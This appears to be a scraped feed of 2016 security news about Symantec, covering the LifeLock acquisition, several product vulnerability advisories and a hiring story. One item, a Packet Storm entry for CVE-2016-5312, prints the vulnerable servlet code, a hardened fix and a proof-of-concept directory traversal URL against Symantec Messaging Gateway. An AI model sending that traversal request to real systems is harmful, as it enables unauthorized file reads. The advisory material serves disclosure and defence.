Symantec

Symantec made its first major acquisition of the Blue Coat Systems era with a $2.3 billion acquisition of identity protection firm LifeLock.

The Symantec-LifeLock deal is expected to close in the first quarter of 2017; the antivirus software maker paid $24 a share for LifeLock, which is approximately 16 percent higher than LifeLock's closing stock price of $20.75. Rumors of the acquisition emerged last week with Bloomberg News reporting that Symantec, along with investment firms Permira and TPG Capital, were interested in bidding on LifeLock.

The LifeLock purchase comes just a few months after a major shakeup at Symantec. The security software giant purchased web and cloud security firm Blue Coat Systems for $4.65 billion in June; Blue Coat CEO Greg Clark was named as Symantec's chief executive, filling the void left by former CEO Michael Brown, who resigned from Symantec in April.

However, the acquisition of LifeLock is a departure from Symantec's recent efforts to chart a new course beyond its legacy antivirus and consumer-focused businesses and focus on new opportunities in cloud security. Following the Blue Coat acquisition, Symantec outlined its "cloud generation" vision, which was carried over from Blue Coat's own strategy to increase its cloud security offerings and combine them with existing web and networking technology.

But in Symantec's second quarter 2017 earnings call earlier this month, Clark stated that although the consumer security business had been in decline, he felt there was still room to grow.

"We believe the market opportunity for protecting consumers is larger than what our current consumer products address today," Clark said. "As we move to further penetrate these opportunities, we expect the Consumer Security business to improve its growth trajectory as we move beyond the PC."

In a conference call Monday, Clark said LifeLock's technology will complement Symantec's Norton consumer products and expand the scope of consumer security offerings.

"Consumers pay between 2x and 3x more for identity protection than they pay for endpoint malware protection," he said. "With this acquisition Symantec accelerates its Consumer Business' return to growth by offering a digital safety platform to protect information, devices, networks and identities of consumers."

LifeLock, which was founded in 2005, has established itself as one of the leading companies in the consumer identity protection market, but the company ran afoul of the U.S. Federal Trade Commission over the years. In 2010, the company paid $12 million to settle claims that it used false claims to promote its identity theft protection services. Under the 2010 settlement, LifeLock agreed to refrain from making deceptive marketing claims and promised to "take more stringent measures to safeguard the personal information they collect from customers," according to the FTC.

However, in 2015 LifeLock was forced to pay an additional $100 million to settle FTC contempt charges after the agency found that LifeLock had violated aspects of the 2010 settlement. Specifically, the FTC said LifeLock "failed to establish and maintain a comprehensive information security program to protect users' sensitive personal information including their social security, credit card and bank account numbers." In addition, the FTC found that LifeLock continued to engage in false advertising claims and failed to abide by the 2010 settlement's recordkeeping requirements.



SearchSecurity: Security Wire Daily News

Symantec has bought identity theft protection firm LifeLock for $2.3bn.

The deal, announced Sunday, represents a brave bid by Symantec to shore up a consumer security business eroded by dwindling anti-virus sales.

Selling Norton consumer security alongside identity protection and remediation services from LifeLock will enable sustainable "consumer segment revenue and profit growth", according to Symantec. The security giant said it plans to finance the transaction with cash supplemented by $750m of new debt. The deal – which is subject to LifeLock stockholder approval and US regulatory approval – is not expected to affect Symantec's FY17 results.

Symantec's share price dropped marginally on the announcement of a deal that effectively involves it "doubling down" on the consumer security market. Data breaches and the identity theft that sometimes results are a growing problem, but whether the sometimes controversial LifeLock offers a comprehensive defence against them is far from clear.

LifeLock's identity theft protection system is designed to alert subscribers about fraudulent applications for loans, credit cards or other financial services.

The $2.3bn price tag ($24 per share) offered by Symantec represents a 16 per cent premium on LifeLock's Friday closing share price of $20.75, itself a year-long high. LifeLock was also reportedly being pursued by private equity firms Permira, TPG, and Evergreen Coast Capital, as well as Symantec.

Symantec sold data storage software firm Veritas to Carlyle Group for $7.4bn earlier this year. Since then it has purchased Blue Coat for $4.65bn and now LifeLock for $2.3bn in a bid to redefine itself as a pure-play cybersecurity firm.

The purchase price looks high even though LifeLock is profitable. The company's net income for 3Q16 came out at $14.4m on sales of $170.3m.

Last year LifeLock was obliged to pay $100 million to settle charges of failing to maintain a comprehensive information security program and deceptive advertising. The court order followed FTC enforcement action against LifeLock for alleged violations of an earlier 2010 order.


The Register - Security

Original release date: November 18, 2016

Symantec has released security updates to address a vulnerability in Norton and Symantec enterprise products. Exploitation of this vulnerability may allow an attacker to take control of an affected system.

Users and administrators are encouraged to review Symantec Security Advisory SYM16-021 and apply the necessary updates.



US-CERT Current Activity

In an already troubled year for Symantec, the company reported another major vulnerability in three of its enterprise security products.

Found in the IT Management Suite 8.0, Ghost Solution Suite 3.1 and Endpoint Virtualization 7.x products, the flaw is a dynamic link library (DLL) loading issue that can be exploited in two different ways. First, an "authorized, but nonprivileged" user could execute malicious DLL code in place of the authorized DLL code. The second way to exploit this DLL code flaw is for outside attackers to trick an authorized user to click on an email link that would download the malicious code. "Ultimately, this problem is caused by a failure to use an absolute path when loading DLLs during product boot up/reboot," Symantec said in its security advisory.

While DLL code vulnerabilities are common and thought to be a lesser threat to enterprises, Symantec rated this vulnerability as high severity. Symantec has not reported any actual exploitation of this vulnerability and has already released product upgrades that will fix the issue for all three products.

However, the discovery of this flaw, listed as CVE-2016-6590, is the latest in a growing line of Symantec security product vulnerabilities found this year. While the DLL flaw was unearthed by Himanshu Mehta, senior threat analysis engineer at Symantec, the three prior batches of flaws were reported by Google Project Zero's Tavis Ormandy.

The previous flaws include an easily exploitable one in the core scanning engine used in most Symantec and Norton antivirus products, as well as a vulnerability -- found just weeks after the first -- caused by unpatched, third-party open source software that was said to be "as bad as it gets" by Ormandy. The most recent set of Symantec bugs were in the file parser component of its antivirus decomposer engine.

In its vulnerability report for the DLL flaw, Symantec recommended several best practices for users of the affected products to reduce the threat, including restricting access to administrative or management systems to authorized privileged users, implementing the principle of least privilege and restricting remote access to only authorized systems.

In other news:

  • A gamer seeking revenge might be responsible for the Oct. 21 attack on domain name system provider Dyn that shut down parts of the internet. In his testimony for a House Energy and Commerce Committee hearing, Level 3 Communications Inc. CSO Dale Drew said the attack was likely the work of a single individual who was specifically targeting the PlayStation Network. "We believe that in the case of Dyn, the relatively unsophisticated attacker sought to take offline a gaming site with which it had a personal grudge," Drew said. The attack used the Mirai malware to launch a distributed denial-of-service attack and gain control over more than 150,000 internet-of-things devices and overwhelm Dyn's systems, which interrupted service to major websites, such as Twitter, Reddit and Netflix.
  • United States Director of National Intelligence James Clapper submitted his letter of resignation on Nov. 16. Clapper oversees 17 different agencies, including the CIA, FBI and National Security Agency, and he is the lead intelligence adviser to President Barack Obama. Clapper -- who is 75 years old and has held the position for six years -- announced his decision to resign in a Congressional hearing, and the Office of the DNI confirmed it on Twitter the following morning. Clapper was a central figure in the debate over government surveillance following the Edward Snowden revelations. He received criticism from lawmakers, security experts and privacy advocates for testifying before Congress in 2013 about the NSA's spying programs, claiming the agency did not engage in bulk data collection on millions of Americans. Clapper's resignation goes into effect at noon on Jan. 20, 2017.
  • Gavin Andresen, chief scientist at the Bitcoin Foundation, has regrets about getting involved in Craig Wright's attempts to prove he created the digital currency bitcoin. Andresen backed Wright's claim to be the mysterious Satoshi Nakamoto -- which he has failed to prove on multiple occasions -- and even defended Wright after his claims were debunked. Andresen has kept a relatively low profile since Wright's last failure six months ago, but posted a brief statement on his blog on Nov. 16. "So, either he was or he wasn't," Andresen wrote on whether or not Wright is Satoshi. "In either case, we should ignore him. I regret ever getting involved in the 'who was Satoshi' game, and am going to spend my time on more fun and productive pursuits."
  • The ransomware known as Crysis suffered a blow Nov. 13, when the master decryption keys were made available to the public after being posted on BleepingComputer forums. Crysis first surfaced in February 2016 when ESET researchers found it was filling in for the receding TeslaCrypt ransomware. According to ESET's report, Crysis is able to "encrypt files on fixed, removable and network drives. It uses strong encryption algorithms and a scheme that makes it difficult to crack in reasonable time." This ransomware was spread primarily through attachments to spam emails, but now its victims have an opportunity to recover what they've lost. The decryption keys -- posted by a BleepingComputer user known only as crss7777 -- cover Crysis versions 2 and 3, and Kaspersky Lab has already added them to the Rakhni decryptor.



SearchSecurity: Security Wire Daily News

# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem lies in the package kavachart-kcServlet-5.3.2.jar, file com/ve/kavachart/servlet/ChartStream.java.
The vulnerable code (decompiled; the imports, class header, catch block and closing braces missing from the dump are restored here) is:

import java.io.IOException;
import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class ChartStream extends HttpServlet {
    public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
        block6: {
            try {
                //**** Taking parameter "sn" from the request and storing it in the "string" variable
                String string = httpServletRequest.getParameter("sn");
                if (string == null) break block6;
                //**** The last three characters of "sn" are later reused as the image subtype (e.g. "png")
                String string2 = string.substring(string.length() - 3);

                //**** The string variable is passed here without any sanitization for directory traversal,
                //**** so a value such as ../../WEB-INF/lib is accepted as-is and can be used for a traversal.
                byte[] arrby = (byte[]) this.getServletContext().getAttribute(string);

                if (arrby != null) {
                    httpServletResponse.setContentType("image/" + string2);
                    ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
                    httpServletResponse.setContentLength(arrby.length);
                    servletOutputStream.write(arrby);
                    this.getServletContext().removeAttribute(string);
                }
                break block6;
            } catch (IOException e) {
                //**** Exception handling not present in the decompiled dump
            }
        }
    }
}

POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/lib
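A hardened form of the doGet above, added here as an illustration and not the vendor's actual fix: before the sn value is used as a lookup key it is allowlisted as a single file-name-shaped token with an image extension, so the ../../WEB-INF/lib value from the PoC is rejected with a 400 instead of being passed through. The class name SafeChartStream, the name pattern and the length limit are assumptions.

```java
import java.io.IOException;
import java.util.regex.Pattern;

import javax.servlet.ServletOutputStream;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Added example: validates the "sn" parameter before it reaches any lookup.
public class SafeChartStream extends HttpServlet {

    // Assumed allowlist: one path component, no separators or "..", image extension only.
    private static final Pattern CHART_NAME =
            Pattern.compile("^[A-Za-z0-9_-]{1,64}\\.(png|jpg|jpeg|gif)$");

    static boolean isValidChartName(String sn) {
        return sn != null && CHART_NAME.matcher(sn).matches();
    }

    // Derive the MIME type from the validated extension instead of the last three
    // characters of the raw parameter (which mislabels "jpeg" and throws on short input).
    static String contentTypeFor(String sn) {
        String ext = sn.substring(sn.lastIndexOf('.') + 1).toLowerCase();
        return "jpg".equals(ext) ? "image/jpeg" : "image/" + ext;
    }

    @Override
    public void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
        String sn = req.getParameter("sn");
        if (!isValidChartName(sn)) {
            // "../../WEB-INF/lib" and any other traversal-shaped value stops here.
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "invalid chart name");
            return;
        }
        byte[] image = (byte[]) getServletContext().getAttribute(sn);
        if (image == null) {
            resp.sendError(HttpServletResponse.SC_NOT_FOUND);
            return;
        }
        resp.setContentType(contentTypeFor(sn));
        resp.setContentLength(image.length);
        ServletOutputStream out = resp.getOutputStream();
        out.write(image);
        getServletContext().removeAttribute(sn);
    }
}
```

On the defensive side, a request to the ChartStream servlet whose sn parameter contains "/" or ".." is also a usable detection signature in the control center's access logs for the unpatched versions.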


Exploit Files ≈ Packet Storm

The Google Project Zero bug reports just keep coming for Symantec.

Symantec patched two flaws in the file parser component of its antivirus decomposer engine, used by many Symantec products, after they were discovered in June by Google Project Zero information security engineer Tavis Ormandy. The bugs, which are the latest in a series of high-profile vulnerabilities affecting Symantec antivirus products, appear to parallel those Ormandy reported, and were patched by Symantec, earlier this year.

Although Symantec's report indicated the patched vulnerabilities were of medium severity, Ormandy disagreed, claiming Symantec had mischaracterized the flaws as enabling denial-of-service attacks; Ormandy insisted that they enable remote code execution attacks.

Via its LiveUpdate system, Symantec patched all Norton Security and Norton Antivirus products for Windows and Mac, but many of its enterprise products will need to be updated manually.

Ormandy wrote in the issue report: "We pointed out to Symantec that they hadn't updated their unrar-based unpacker for years, and it was vulnerable to dozens of publicly documented flaws." Anticipating that Symantec would fix that in all of its code bases, Ormandy went on, "but they appear to have just backported fixes for the few issues I sent them."

"Here are two known bugs in unrar that are fixed upstream, but not in Symantec's ancient code. If they continue to refuse to rebase, this might take a few iterations to shake the bugs out. Sigh."

This is the third batch of flaws in Symantec security products reported by Ormandy this year; the first, in May, included a vulnerability Ormandy described as being "as bad as it can possibly get." At the time, Ormandy wrote, that flaw, an RCE vulnerability, was particularly bad because Symantec used "a filter driver to intercept all system I/O, just emailing a file to a victim or sending them a link is enough to exploit it."



SearchSecurity: Security Wire Daily News

DEF CON Hardcore hackers and the corporate security industry have never really got on that well. Symantec is looking to change that after hiring Tarah Wheeler to act as its cybersecurity czar.

Wheeler has a long career in the IT industry, including stints at Microsoft and Blackphone-maker Silent Circle. Both of her parents worked in security for the US government, she has attended hacker conventions across the US, and gone as far as embedding an RFID chip in her left hand.

“Symantec wanted a nerd and they got a nerd,” she told The Register. “I’m joining to talk to the independent hacker community and find crazy and interesting research that isn’t showing up on the corporate radar.”

She said that the problems between the hacker community and the professional security industry are understandable. "In America, firms don’t hire hackers, they jail them,” she opined, and acknowledged there’s a lot of mistrust to overcome.

But Symantec is serious about rectifying this, she said, otherwise she wouldn't have taken the job. The software biz wants to engage with the community, use their talents, and has a “fire in its belly” about the issue. She has an uphill task, based on conversations we’ve had with hackers at DEF CON.

Meanwhile, Wheeler's just published a book titled Women in Tech as part of a campaign to get more diversity in the IT community. In 1984, 38 per cent of US computer science degrees were earned by women, she said, but that’s down to just 12 per cent now. While there are more women in the cybersecurity industry, the field is growing so rapidly that the diversity gap is growing yearly.

DEF CON’s a good place to address this; it’s much less of a sausage-fest than most IT conferences. With her new role, Wheeler is hoping to get hackers onside, and do something to address the gender issues in the industry.


The Register - Security

All Symantec and Norton branded antivirus products

Symantec and Norton branded antivirus products contain multiple vulnerabilities. Some of these products are in widespread use throughout government and industry. Exploitation of these vulnerabilities could allow a remote attacker to take control of an affected system.

The vulnerabilities are listed below:

CVE-2016-2207

CVE-2016-2208

  • Symantec antivirus products use common unpackers to extract malware binaries when scanning a system. A heap overflow vulnerability in the ASPack unpacker could allow an unauthenticated remote attacker to gain root privileges on Linux or OSX platforms. The vulnerability can be triggered remotely using a malicious file (via email or link) with no user interaction. [2]

CVE-2016-2209 

  • Symantec: PowerPoint misaligned stream-cache remote stack buffer overflow [3]

CVE-2016-2210

  • Symantec: Remote Stack Buffer Overflow in dec2lha library [4]         

CVE-2016-2211

  • Symantec: Symantec Antivirus multiple remote memory corruption unpacking MSPACK Archives [5]

CVE-2016-3644

  • Symantec: Heap overflow modifying MIME messages [6]      

CVE-2016-3645

  • Symantec: Integer Overflow in TNEF decoder [7]       

CVE-2016-3646

  • Symantec: missing bounds checks in dec2zip ALPkOldFormatDecompressor::UnShrink [8]

The large number of products affected (24 products), across multiple platforms (OSX, Windows, and Linux), and the severity of these vulnerabilities (remote code execution at root or SYSTEM privilege) make this a very serious event. A remote, unauthenticated attacker may be able to run arbitrary code at root or SYSTEM privileges by taking advantage of these vulnerabilities. Some of the vulnerabilities require no user interaction and are network-aware, which could result in a wormable event.

Symantec has provided patches or hotfixes to these vulnerabilities in their SYM16-008 [9] and SYM16-010 [10] security advisories.

US-CERT encourages users and network administrators to patch Symantec or Norton antivirus products immediately. While there has been no evidence of exploitation, the ease of attack, widespread nature of the products, and severity of the exploit may make this vulnerability a popular target.


US-CERT Alerts